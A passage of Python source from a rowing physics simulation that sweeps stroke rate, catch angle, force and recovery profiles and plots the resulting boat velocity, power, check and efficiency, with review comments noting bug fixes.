        energies = zeros(aantal)
        check = zeros(aantal)
        rim_check = zeros(aantal)
        rim_e = zeros(aantal)
        crew.strokeprofile = profile
        for i in range(len(tempos)):
            dv = 1
            vend = 4
            crew.tempo = tempos[i]
            catchacceler = 5.0
            # converge average velocity, feeding back the catch acceleration
            while (dv/vend > 0.001):
                res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
                                                  timewise=timewise,
                                                  catchacceler=catchacceler)
                dv = res[0]
                vend = res[1]
                catchacceler = res[14]
                if verbose:
                    print(catchacceler)
            res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
                                       timewise=timewise,
                                       catchacceler=catchacceler)
            velocity[i] = res[2]
            ratios[i] = res[3]
            energies[i] = res[4]
            power[i] = res[5]
            check[i] = res[9]
            rim_check[i] = res[11]
            rim_e[i] = res[10]
        return velocity,power,check,rim_check,rim_e

    profiles = [trapezium(x1=0.1,h2=0.5),
                trapezium(x1=0.1,h2=0.75),
                trapezium(x1=0.1,x2=0.5,h2=0.75),
                trapezium(x1=0.15,x2=0.5,h2=0.9),
                trapezium()]
    # the original printed catchacceler only for the first profile
    results = [_sweep(p,verbose=(k==0)) for k,p in enumerate(profiles)]
    velocities = [r[0] for r in results]
    powers = [r[1] for r in results]
    checks = [r[2] for r in results]
    rim_checks = [r[3] for r in results]
    rim_es = [r[4] for r in results]
    calctime = time.time()-tm
    # convert average velocities to 500m split times (seconds)
    secs = []
    for v in velocities:
        [mins,sec] = rowingphysics.vavgto500mtime(v)
        secs.append(sec+(mins-1)*60.)
    labels = ['T1','T2','T3','T4','T5']
    dotstyles = ['go','rs','bv','k^','mo']
    linestyles = ['-g','-r','-b','-k','-m']
    linedots = ['-go','-rs','-bv','-k^','-mo']
    # plots
    try:
        # was 'pyplot.clf' (attribute access, no call): figure never cleared
        pyplot.clf()
        if (doplot == 1):
            for p,v,st,lb in zip(powers,velocities,dotstyles,labels):
                pyplot.plot (p,v,st,label=lb+' ')
            pylab.legend(loc='best')
            pyplot.xlabel("Power (W)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 2):
            for v,st,lb in zip(velocities,linestyles,labels):
                pyplot.plot (tempos,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("tempo (spm)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 3):
            for p,st,lb in zip(powers,linestyles,labels):
                pyplot.plot (tempos,p,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("tempo (spm)")
            pyplot.ylabel('Power (W)')
        if (doplot == 4):
            # fixed: original paired power4/sec3, power3/sec4 and power3/sec5
            for p,s,st,lb in zip(powers,secs,linestyles,labels):
                pyplot.plot (p,s,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("Power (W)")
            pyplot.ylabel('500m time')
        if (doplot == 5):
            for c,v,st,lb in zip(checks,velocities,dotstyles,labels):
                pyplot.plot (c,v,st,label=lb+' ')
            pylab.legend(loc='best')
            pyplot.xlabel("Check (m2/s4)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 6):
            for c,st,lb in zip(checks,dotstyles,labels):
                pyplot.plot (tempos,c,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("tempo (spm)")
            pyplot.ylabel('Crewnerd Check (m2/s4)')
        if (doplot == 7):
            for rc,v,st,lb in zip(rim_checks,velocities,linedots,labels):
                pyplot.plot (rc,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.ylabel("velocity (m/s)")
            pyplot.xlabel('RIM Check (m/s)')
        if (doplot == 8):
            for re,v,st,lb in zip(rim_es,velocities,dotstyles,labels):
                pyplot.plot (re,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.ylabel("velocity (m/s)")
            pyplot.xlabel('RIM Stroke Efficiency (m)')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def catchseriesRIM(anglemin,anglemax,F,crew,rigging,
                   aantal=30,timestep=0.03,doplot=1,timewise=0):
    """ Various plots for different catch angles and style

    Sweeps the catch angle from anglemin to anglemax (radians, aantal
    steps) for four strongmiddle2 stroke profiles (frac = -0.5, 0, 0.5,
    1.0) and the default trapezium (labelled T1..T5) at constant handle
    force F, then draws the chart selected by doplot:
      1: velocity vs power        5: velocity vs CrewNerd check
      2: velocity vs angle        6: check vs angle
      3: power vs angle           7: velocity vs RIM check
      4: 500m time vs power       8: velocity vs RIM stroke efficiency
    Returns the wall-clock calculation time in seconds.
    NOTE(review): mutates crew.strokeprofile and rigging.catchangle in
    place; crew.strokeprofile is left at trapezium() on return.
    """
    from .crew import flat,strongmiddle,strongmiddle2,strongend,strongbegin,trapezium
    tm = time.time()
    catchangles = linspace(anglemin,anglemax,aantal)

    def _sweep(profile,verbose=0):
        # Run the catch-angle sweep for one stroke profile and collect
        # the per-angle steady-state stroke metrics.
        velocity = zeros(aantal)
        power = zeros(aantal)
        ratios = zeros(aantal)
        energies = zeros(aantal)
        check = zeros(aantal)
        rim_check = zeros(aantal)
        rim_e = zeros(aantal)
        crew.strokeprofile = profile
        for i in range(len(catchangles)):
            dv = 1
            vend = 4
            rigging.catchangle = catchangles[i]
            catchacceler = 5.0
            # converge average velocity, feeding back the catch acceleration
            while (dv/vend > 0.001):
                res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
                                                  timewise=timewise,
                                                  catchacceler=catchacceler)
                dv = res[0]
                vend = res[1]
                catchacceler = res[14]
                if verbose:
                    print(catchacceler)
            res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
                                       timewise=timewise,
                                       catchacceler=catchacceler)
            velocity[i] = res[2]
            ratios[i] = res[3]
            energies[i] = res[4]
            power[i] = res[5]
            check[i] = res[9]
            rim_check[i] = res[11]
            rim_e[i] = res[10]
        return velocity,power,check,rim_check,rim_e

    profiles = [strongmiddle2(frac=-0.5),
                strongmiddle2(frac=0),
                strongmiddle2(frac=0.5),
                strongmiddle2(frac=1.0),
                trapezium()]
    # the original printed catchacceler only for the first profile
    results = [_sweep(p,verbose=(k==0)) for k,p in enumerate(profiles)]
    velocities = [r[0] for r in results]
    powers = [r[1] for r in results]
    checks = [r[2] for r in results]
    rim_checks = [r[3] for r in results]
    rim_es = [r[4] for r in results]
    calctime = time.time()-tm
    # convert average velocities to 500m split times (seconds)
    secs = []
    for v in velocities:
        [mins,sec] = rowingphysics.vavgto500mtime(v)
        secs.append(sec+(mins-1)*60.)
    # radians to degrees for the plot axes
    catchangles = 180*catchangles/pi
    labels = ['T1','T2','T3','T4','T5']
    dotstyles = ['go','rs','bv','k^','mo']
    linestyles = ['-g','-r','-b','-k','-m']
    linedots = ['-go','-rs','-bv','-k^','-mo']
    # plots
    try:
        # was 'pyplot.clf' (attribute access, no call): figure never cleared
        pyplot.clf()
        if (doplot == 1):
            for p,v,st,lb in zip(powers,velocities,dotstyles,labels):
                pyplot.plot (p,v,st,label=lb+' ')
            pylab.legend(loc='best')
            pyplot.xlabel("Power (W)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 2):
            for v,st,lb in zip(velocities,linestyles,labels):
                pyplot.plot (catchangles,v,st,label=lb)
            pylab.legend(loc='best')
            # was "angle (spm)"; the axis is the catch angle in degrees
            pyplot.xlabel("angle (degrees)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 3):
            for p,st,lb in zip(powers,linestyles,labels):
                pyplot.plot (catchangles,p,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("angle (degrees)")
            pyplot.ylabel('Power (W)')
        if (doplot == 4):
            # fixed: original paired power4/sec3, power3/sec4 and power3/sec5
            for p,s,st,lb in zip(powers,secs,linestyles,labels):
                pyplot.plot (p,s,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("Power (W)")
            pyplot.ylabel('500m time')
        if (doplot == 5):
            for c,v,st,lb in zip(checks,velocities,dotstyles,labels):
                pyplot.plot (c,v,st,label=lb+' ')
            pylab.legend(loc='best')
            pyplot.xlabel("Check (m2/s4)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 6):
            for c,st,lb in zip(checks,dotstyles,labels):
                pyplot.plot (catchangles,c,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("angle (degrees)")
            pyplot.ylabel('Crewnerd Check (m2/s4)')
        if (doplot == 7):
            for rc,v,st,lb in zip(rim_checks,velocities,linedots,labels):
                pyplot.plot (rc,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.ylabel("velocity (m/s)")
            pyplot.xlabel('RIM Check (m/s)')
        if (doplot == 8):
            for re,v,st,lb in zip(rim_es,velocities,dotstyles,labels):
                pyplot.plot (re,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.ylabel("velocity (m/s)")
            pyplot.xlabel('RIM Stroke Efficiency (m)')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def styleseriesRIM(tempomin,tempomax,F,crew,rigging,
                   aantal=30,timestep=0.03,doplot=1,timewise=0):
    """ Various plots for different stroke rates and rowing styles

    Sweeps the stroke rate from tempomin to tempomax (spm, aantal steps)
    for four strongmiddle2 stroke profiles (frac = -0.5, 0, 0.5, 1.0)
    and the default trapezium (labelled T1..T5) at constant handle force
    F, then draws the chart selected by doplot:
      1: velocity vs power        6: check vs tempo
      2: velocity vs tempo        7: velocity vs RIM check
      3: power vs tempo           8: velocity vs RIM stroke efficiency
      4: 500m time vs power       9: velocity vs fluid drag efficiency
      5: velocity vs check       10: velocity vs efficiency
    Returns the wall-clock calculation time in seconds.
    NOTE(review): mutates crew.strokeprofile and crew.tempo in place;
    crew.strokeprofile is left at trapezium() on return.
    """
    from .crew import flat,strongmiddle,strongmiddle2,strongend,strongbegin,trapezium
    tm = time.time()
    tempos = linspace(tempomin,tempomax,aantal)

    def _sweep(profile,verbose=0):
        # Run the tempo sweep for one stroke profile and collect the
        # per-tempo steady-state stroke metrics.
        velocity = zeros(aantal)
        power = zeros(aantal)
        ratios = zeros(aantal)
        energies = zeros(aantal)
        check = zeros(aantal)
        rim_check = zeros(aantal)
        rim_e = zeros(aantal)
        efficiencies = zeros(aantal)
        rim_effs = zeros(aantal)
        crew.strokeprofile = profile
        for i in range(len(tempos)):
            dv = 1
            vend = 4
            crew.tempo = tempos[i]
            catchacceler = 5.0
            # converge average velocity, feeding back the catch acceleration
            while (dv/vend > 0.001):
                res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
                                                  timewise=timewise,
                                                  catchacceler=catchacceler)
                dv = res[0]
                vend = res[1]
                catchacceler = res[14]
                if verbose:
                    print(catchacceler)
            res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
                                       timewise=timewise,
                                       catchacceler=catchacceler)
            velocity[i] = res[2]
            ratios[i] = res[3]
            energies[i] = res[4]
            power[i] = res[5]
            efficiencies[i] = res[6]
            rim_effs[i] = res[15]
            check[i] = res[9]
            rim_check[i] = res[11]
            rim_e[i] = res[10]
        return velocity,power,check,rim_check,rim_e,efficiencies,rim_effs

    profiles = [strongmiddle2(frac=-0.5),
                strongmiddle2(frac=0),
                strongmiddle2(frac=0.5),
                strongmiddle2(frac=1.0),
                trapezium()]
    # the original printed catchacceler only for the first profile
    results = [_sweep(p,verbose=(k==0)) for k,p in enumerate(profiles)]
    velocities = [r[0] for r in results]
    powers = [r[1] for r in results]
    checks = [r[2] for r in results]
    rim_checks = [r[3] for r in results]
    rim_es = [r[4] for r in results]
    efficiencies = [r[5] for r in results]
    rim_effs = [r[6] for r in results]
    calctime = time.time()-tm
    # convert average velocities to 500m split times (seconds)
    secs = []
    for v in velocities:
        [mins,sec] = rowingphysics.vavgto500mtime(v)
        secs.append(sec+(mins-1)*60.)
    labels = ['T1','T2','T3','T4','T5']
    dotstyles = ['go','rs','bv','k^','mo']
    linestyles = ['-g','-r','-b','-k','-m']
    linedots = ['-go','-rs','-bv','-k^','-mo']
    # plots
    try:
        # was 'pyplot.clf' (attribute access, no call): figure never cleared
        pyplot.clf()
        if (doplot == 1):
            for p,v,st,lb in zip(powers,velocities,dotstyles,labels):
                pyplot.plot (p,v,st,label=lb+' ')
            pylab.legend(loc='best')
            pyplot.xlabel("Power (W)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 2):
            for v,st,lb in zip(velocities,linestyles,labels):
                pyplot.plot (tempos,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("tempo (spm)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 3):
            for p,st,lb in zip(powers,linestyles,labels):
                pyplot.plot (tempos,p,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("tempo (spm)")
            pyplot.ylabel('Power (W)')
        if (doplot == 4):
            # fixed: original paired power4/sec3, power3/sec4 and power3/sec5
            for p,s,st,lb in zip(powers,secs,linestyles,labels):
                pyplot.plot (p,s,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("Power (W)")
            pyplot.ylabel('500m time')
        if (doplot == 5):
            for c,v,st,lb in zip(checks,velocities,dotstyles,labels):
                pyplot.plot (c,v,st,label=lb+' ')
            pylab.legend(loc='best')
            pyplot.xlabel("Check (m2/s4)")
            pyplot.ylabel('Velocity (m/s)')
        if (doplot == 6):
            for c,st,lb in zip(checks,dotstyles,labels):
                pyplot.plot (tempos,c,st,label=lb)
            pylab.legend(loc='best')
            pyplot.xlabel("tempo (spm)")
            pyplot.ylabel('Crewnerd Check (m2/s4)')
        if (doplot == 7):
            for rc,v,st,lb in zip(rim_checks,velocities,linedots,labels):
                pyplot.plot (rc,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.ylabel("velocity (m/s)")
            pyplot.xlabel('RIM Check (m/s)')
        if (doplot == 8):
            for re,v,st,lb in zip(rim_es,velocities,dotstyles,labels):
                pyplot.plot (re,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.ylabel("velocity (m/s)")
            pyplot.xlabel('RIM Stroke Efficiency (m)')
        if (doplot == 9):
            for ef,v,st,lb in zip(rim_effs,velocities,dotstyles,labels):
                pyplot.plot (ef,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.ylabel("velocity (m/s)")
            pyplot.xlabel('Fluid Drag Efficiency')
        if (doplot == 10):
            for ef,v,st,lb in zip(efficiencies,velocities,dotstyles,labels):
                pyplot.plot (ef,v,st,label=lb)
            pylab.legend(loc='best')
            pyplot.ylabel("velocity (m/s)")
            pyplot.xlabel('Efficiency')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def styleseriesforce(Fmin,Fmax,crew,rigging,
                     aantal=30,timestep=0.03,doplot=1,timewise=0):
    """ Plots various plots for varying forces

    Sweeps the average handle force from Fmin to Fmax (N) over `aantal`
    steps for five different stroke (force) profiles T1..T5 and renders
    the plot selected by `doplot` (1..8).  Mutates crew.strokeprofile.
    Returns the wall-clock calculation time in seconds.
    """
    from .crew import flat,strongmiddle,strongend,strongbegin,trapezium
    tm = time.time()
    Forces = linspace(Fmin,Fmax,aantal)

    def _sweep(profile):
        # Run the steady-state simulation at every force value for the
        # given stroke profile; returns per-force result arrays.
        crew.strokeprofile = profile
        velocity = zeros(aantal)
        power = zeros(aantal)
        ratios = zeros(aantal)
        energies = zeros(aantal)
        check = zeros(aantal)
        RIM_check = zeros(aantal)
        RIM_E = zeros(aantal)
        for i in range(len(Forces)):
            dv = 1
            vend = 4
            catchacceler = 5.0
            # iterate energybalance until the end velocity converges
            while (dv/vend > 0.001):
                res = rowingphysics.energybalance(Forces[i],crew,rigging,vend,timestep,0,
                                                  timewise=timewise,
                                                  catchacceler=catchacceler)
                dv = res[0]
                vend = res[1]
                catchacceler = res[14]
            res = rowingphysics.stroke(Forces[i],crew,rigging,vend,timestep,10,
                                       timewise=timewise,
                                       catchacceler=catchacceler)
            velocity[i] = res[2]
            ratios[i] = res[3]
            energies[i] = res[4]
            power[i] = res[5]
            check[i] = res[9]
            RIM_check[i] = res[11]
            RIM_E[i] = res[10]
        return velocity,power,ratios,energies,check,RIM_check,RIM_E

    # The five stroke profiles, identical to the original T1..T5 cases.
    (velocity1,power1,ratios1,energies1,
     check1,RIM_check1,RIM_E1) = _sweep(trapezium(x1=0.1,h2=0.5))          # flat()
    (velocity2,power2,ratios2,energies2,
     check2,RIM_check2,RIM_E2) = _sweep(trapezium(x1=0.1,h2=0.75))         # strongbegin()
    (velocity3,power3,ratios3,energies3,
     check3,RIM_check3,RIM_E3) = _sweep(trapezium(x1=0.1,x2=0.5,h2=0.75))  # strongend()
    (velocity4,power4,ratios4,energies4,
     check4,RIM_check4,RIM_E4) = _sweep(trapezium(x1=0.15,x2=0.5,h2=0.9))  # trapezium()
    (velocity5,power5,ratios5,energies5,
     check5,RIM_check5,RIM_E5) = _sweep(trapezium())
    calctime = time.time()-tm

    def _to500sec(velocity):
        # Convert average velocity to a 500m split expressed in seconds.
        [mins,secs] = rowingphysics.vavgto500mtime(velocity)
        return secs+(mins-1)*60.

    sec1 = _to500sec(velocity1)
    sec2 = _to500sec(velocity2)
    sec3 = _to500sec(velocity3)
    sec4 = _to500sec(velocity4)
    sec5 = _to500sec(velocity5)

    def _plot5(xseries,yseries,styles,labels,xlab,ylab):
        # Plot the five series with a shared legend and axis labels.
        for x,y,st,lb in zip(xseries,yseries,styles,labels):
            pyplot.plot(x,y,st,label=lb)
        pylab.legend(loc='best')
        pyplot.xlabel(xlab)
        pyplot.ylabel(ylab)

    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        markers = ['go','rs','bv','k^','mo']
        lines = ['-g','-r','-b','-k','-m']
        linemarkers = ['-go','-rs','-bv','-k^','-mo']
        labels = ['T1','T2','T3','T4','T5']
        labels_sp = ['T1 ','T2 ','T3 ','T4 ','T5 ']
        vels = [velocity1,velocity2,velocity3,velocity4,velocity5]
        pows = [power1,power2,power3,power4,power5]
        secs = [sec1,sec2,sec3,sec4,sec5]
        checks = [check1,check2,check3,check4,check5]
        rimchecks = [RIM_check1,RIM_check2,RIM_check3,RIM_check4,RIM_check5]
        rimes = [RIM_E1,RIM_E2,RIM_E3,RIM_E4,RIM_E5]
        if (doplot == 1):
            _plot5(pows,vels,markers,labels_sp,"Power (W)",'Velocity (m/s)')
        if (doplot == 2):
            _plot5([Forces]*5,vels,lines,labels,"Force (N)",'Velocity (m/s)')
        if (doplot == 3):
            _plot5([Forces]*5,pows,lines,labels,"Force (N)",'Power (W)')
        if (doplot == 4):
            # BUG FIX: the series were mismatched (power4/sec3, power3/sec4,
            # power3/sec5); now each power series is paired with its own split.
            _plot5(pows,secs,lines,labels,"Power (W)",'500m time')
        if (doplot == 5):
            _plot5(checks,vels,markers,labels_sp,"Check (m2/s4)",'Velocity (m/s)')
        if (doplot == 6):
            _plot5([Forces]*5,checks,markers,labels,"Force (N)",'Crewnerd Check (m2/s4)')
        if (doplot == 7):
            _plot5(rimchecks,vels,linemarkers,labels,'RIM Check (m/s)',"velocity (m/s)")
        if (doplot == 8):
            _plot5(rimes,vels,markers,labels,'RIM Stroke Efficiency (m)',"velocity (m/s)")
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def recoverystyleseries(tempomin,tempomax,F,crew,rigging,
                        aantal=30,timestep=0.03,doplot=1,timewise=0):
    """ Various plots with varying recovery style

    Sweeps the stroke rate from tempomin to tempomax (spm) for four
    recovery speed profiles (constant, sinus, triangle, realistic) at
    fixed force F and renders the plot selected by `doplot` (1..8).
    Mutates crew.recprofile and crew.tempo.  Returns the wall-clock
    calculation time in seconds.
    """
    from .crew import flatrecovery,sinusrecovery,trianglerecovery,realisticrecovery
    tm = time.time()
    tempos = linspace(tempomin,tempomax,aantal)

    def _sweep(recprofile):
        # Run the steady-state simulation at every stroke rate with the
        # given recovery profile; returns per-tempo result arrays.
        crew.recprofile = recprofile
        velocity = zeros(aantal)
        power = zeros(aantal)
        ratios = zeros(aantal)
        energies = zeros(aantal)
        check = zeros(aantal)
        RIM_check = zeros(aantal)
        RIM_E = zeros(aantal)
        for i in range(len(tempos)):
            dv = 1
            vend = 4
            crew.tempo = tempos[i]
            catchacceler = 5.0
            # iterate energybalance until the end velocity converges
            while (dv/vend > 0.001):
                res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
                                                  timewise=timewise,
                                                  catchacceler=catchacceler)
                dv = res[0]
                vend = res[1]
                catchacceler = res[14]
            res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
                                       timewise=timewise,
                                       catchacceler=catchacceler)
            velocity[i] = res[2]
            ratios[i] = res[3]
            energies[i] = res[4]
            power[i] = res[5]
            check[i] = res[9]
            RIM_check[i] = res[11]
            RIM_E[i] = res[10]
        return velocity,power,ratios,energies,check,RIM_check,RIM_E

    # The four recovery profiles, identical to the original cases.
    (velocity1,power1,ratios1,energies1,
     check1,RIM_check1,RIM_E1) = _sweep(flatrecovery())
    (velocity2,power2,ratios2,energies2,
     check2,RIM_check2,RIM_E2) = _sweep(sinusrecovery())
    (velocity3,power3,ratios3,energies3,
     check3,RIM_check3,RIM_E3) = _sweep(trianglerecovery())
    (velocity4,power4,ratios4,energies4,
     check4,RIM_check4,RIM_E4) = _sweep(realisticrecovery())
    calctime = time.time()-tm

    def _to500sec(velocity):
        # Convert average velocity to a 500m split expressed in seconds.
        [mins,secs] = rowingphysics.vavgto500mtime(velocity)
        return secs+(mins-1)*60.

    sec1 = _to500sec(velocity1)
    sec2 = _to500sec(velocity2)
    sec3 = _to500sec(velocity3)
    sec4 = _to500sec(velocity4)

    def _plot4(xseries,yseries,labels,xlab,ylab):
        # Plot the four series with a shared legend and axis labels.
        for x,y,st,lb in zip(xseries,yseries,['-g','-r','-b','-k'],labels):
            pyplot.plot(x,y,st,label=lb)
        pylab.legend(loc='best')
        pyplot.xlabel(xlab)
        pyplot.ylabel(ylab)

    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        labels = ['constant','sinus','triangle','realistic']
        labels_sp = ['constant ','sinus ','triangle ','realistic ']
        vels = [velocity1,velocity2,velocity3,velocity4]
        pows = [power1,power2,power3,power4]
        if (doplot==1):
            _plot4(pows,vels,labels_sp,"Power (W)",'Velocity (m/s)')
        if (doplot==2):
            _plot4([tempos]*4,vels,labels,"tempo (spm)",'Velocity (m/s)')
        if (doplot==3):
            _plot4([tempos]*4,pows,labels_sp,"tempo (spm)",'Power (W)')
        if (doplot==4):
            _plot4(pows,[sec1,sec2,sec3,sec4],labels,"Power (W)",'500m time')
        if (doplot==5):
            _plot4([check1,check2,check3,check4],vels,labels,
                   "Check (m2/s4)",'Velocity (m/s)')
        if (doplot == 6):
            _plot4([RIM_check1,RIM_check2,RIM_check3,RIM_check4],vels,labels,
                   'RIM Check (m/s)',"velocity (m/s)")
        if (doplot == 7):
            _plot4([RIM_E1,RIM_E2,RIM_E3,RIM_E4],vels,labels,
                   'RIM Stroke Efficiency (m)',"velocity (m/s)")
        if (doplot == 8):
            _plot4([ratios1,ratios2,ratios3,ratios4],vels,labels,
                   'Stroke/Recovery Ratio',"velocity (m/s)")
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def recoverystyletriangle(tempomin,tempomax,F,crew,rigging,aantal=30,timestep=0.03,doplot=1,timewise=0):
    """ Various plots for triangle recovery profiles with different apex positions.

    Sweeps the stroke rate from tempomin to tempomax (spm) for triangle
    recovery profiles with apex fractions 0.1, 0.3, 0.5 and 0.7 at fixed
    force F and renders the plot selected by `doplot` (1..8).  Mutates
    crew.recprofile and crew.tempo.  Returns the wall-clock calculation
    time in seconds.
    """
    from .crew import flatrecovery,sinusrecovery,trianglerecovery,realisticrecovery
    tm = time.time()
    tempos = linspace(tempomin,tempomax,aantal)

    def _sweep(recprofile):
        # Run the steady-state simulation at every stroke rate with the
        # given recovery profile; returns per-tempo result arrays.
        crew.recprofile = recprofile
        velocity = zeros(aantal)
        power = zeros(aantal)
        ratios = zeros(aantal)
        energies = zeros(aantal)
        check = zeros(aantal)
        RIM_check = zeros(aantal)
        RIM_E = zeros(aantal)
        for i in range(len(tempos)):
            dv = 1
            vend = 4
            crew.tempo = tempos[i]
            catchacceler = 5.0
            # iterate energybalance until the end velocity converges
            while (dv/vend > 0.001):
                res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
                                                  timewise=timewise,
                                                  catchacceler=catchacceler)
                dv = res[0]
                vend = res[1]
                catchacceler = res[14]
            res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
                                       timewise=timewise,
                                       catchacceler=catchacceler)
            velocity[i] = res[2]
            ratios[i] = res[3]
            energies[i] = res[4]
            power[i] = res[5]
            check[i] = res[9]
            RIM_check[i] = res[11]
            RIM_E[i] = res[10]
        return velocity,power,ratios,energies,check,RIM_check,RIM_E

    # Four triangle profiles with increasing apex fraction.
    (velocity1,power1,ratios1,energies1,
     check1,RIM_check1,RIM_E1) = _sweep(trianglerecovery(0.1))
    (velocity2,power2,ratios2,energies2,
     check2,RIM_check2,RIM_E2) = _sweep(trianglerecovery(0.3))
    (velocity3,power3,ratios3,energies3,
     check3,RIM_check3,RIM_E3) = _sweep(trianglerecovery(0.5))
    (velocity4,power4,ratios4,energies4,
     check4,RIM_check4,RIM_E4) = _sweep(trianglerecovery(0.7))
    calctime = time.time()-tm

    def _to500sec(velocity):
        # Convert average velocity to a 500m split expressed in seconds.
        [mins,secs] = rowingphysics.vavgto500mtime(velocity)
        return secs+(mins-1)*60.

    sec1 = _to500sec(velocity1)
    sec2 = _to500sec(velocity2)
    sec3 = _to500sec(velocity3)
    sec4 = _to500sec(velocity4)

    def _plot4(xseries,yseries,labels,xlab,ylab):
        # Plot the four series with a shared legend and axis labels.
        for x,y,st,lb in zip(xseries,yseries,['-g','-r','-b','-k'],labels):
            pyplot.plot(x,y,st,label=lb)
        pylab.legend(loc='best')
        pyplot.xlabel(xlab)
        pyplot.ylabel(ylab)

    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        labels = ['0.1','0.3','0.5','0.7']
        labels_sp = ['0.1 ','0.3 ','0.5 ','0.7 ']
        vels = [velocity1,velocity2,velocity3,velocity4]
        pows = [power1,power2,power3,power4]
        if (doplot==1):
            _plot4(pows,vels,labels_sp,"Power (W)",'Velocity (m/s)')
        if (doplot==2):
            _plot4([tempos]*4,vels,labels,"tempo (spm)",'Velocity (m/s)')
        if (doplot==3):
            # BUG FIX: labels were copy-paste leftovers ('sinus', 'triangle',
            # 'realistic') from recoverystyleseries; these series are the
            # triangle apex fractions 0.1/0.3/0.5/0.7.
            _plot4([tempos]*4,pows,labels_sp,"tempo (spm)",'Power (W)')
        if (doplot==4):
            _plot4(pows,[sec1,sec2,sec3,sec4],labels,"Power (W)",'500m time')
        if (doplot==5):
            _plot4([check1,check2,check3,check4],vels,labels,
                   "Check (m2/s4)",'Velocity (m/s)')
        if (doplot == 6):
            _plot4([RIM_check1,RIM_check2,RIM_check3,RIM_check4],vels,labels,
                   'RIM Check (m/s)',"velocity (m/s)")
        if (doplot == 7):
            _plot4([RIM_E1,RIM_E2,RIM_E3,RIM_E4],vels,labels,
                   'RIM Stroke Efficiency (m)',"velocity (m/s)")
        if (doplot == 8):
            _plot4([ratios1,ratios2,ratios3,ratios4],vels,labels,
                   'Stroke/Recovery Ratio',"velocity (m/s)")
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def forceseries(Forcemin,Forcemax,tempo,crew,rigging,aantal=10,timestep=.03,timewise=0):
    """ Plots velocity, power and ratio for a sweep of average forces at fixed tempo.

    BUG FIX: `timewise` was referenced but never defined (NameError at
    runtime); it is now a keyword parameter with default 0, matching the
    other series functions and keeping existing callers working.
    Returns the wall-clock calculation time in seconds.
    """
    tm = time.time()
    crew.tempo = tempo
    Forces = linspace(Forcemin,Forcemax,aantal)
    velocity = zeros(aantal)
    power = zeros(aantal)
    ratios = zeros(aantal)
    energies = zeros(aantal)
    for i in range(len(Forces)):
        dv = 1
        vend = 4
        # iterate energybalance until the end velocity converges
        while (dv/vend > 0.001):
            res = rowingphysics.energybalance(Forces[i],crew,rigging,vend,timestep,0,timewise=timewise)
            dv = res[0]
            vend = res[1]
        res = rowingphysics.stroke(Forces[i],crew,rigging,vend,timestep,10,timewise=timewise)
        velocity[i] = res[2]
        ratios[i] = res[3]
        energies[i] = res[4]
        power[i] = res[5]
    calctime = time.time()-tm
    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        pyplot.subplot(221)
        pyplot.plot (Forces,velocity)
        pyplot.xlabel("Force (N)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(222)
        pyplot.plot (Forces,power)
        pyplot.xlabel("Force (N)")
        pyplot.ylabel('Power (W)')
        pyplot.subplot(223)
        pyplot.plot (power,velocity)
        pyplot.xlabel("Power (W)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(224)
        pyplot.plot (Forces,ratios)
        pyplot.xlabel("Force (N)")
        pyplot.ylabel('Ratio')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def plot_tempo_v_constantwatt(watt,r,rg,aantal=10,
                              timestep=0.03,Fmin=100,
                              Fmax=760,tempomin=20,tempomax=40):
    """ Plots average boat speed at constant power with varying spm

    Sweeps the stroke rate from tempomin to tempomax and solves for the
    force that delivers `watt` W at each rate; plots velocity, efficiency,
    average stroke force and drive-time fraction versus tempo.  Mutates
    r.tempo.  Returns the wall-clock calculation time in seconds.
    """
    tm = time.time()
    tempoos = linspace(tempomin,tempomax,aantal)
    velocity = zeros(aantal)
    ratios = zeros(aantal)
    watts = zeros(aantal)
    fres = zeros(aantal)
    effs = zeros(aantal)
    for i in range(len(tempoos)):
        r.tempo = tempoos[i]
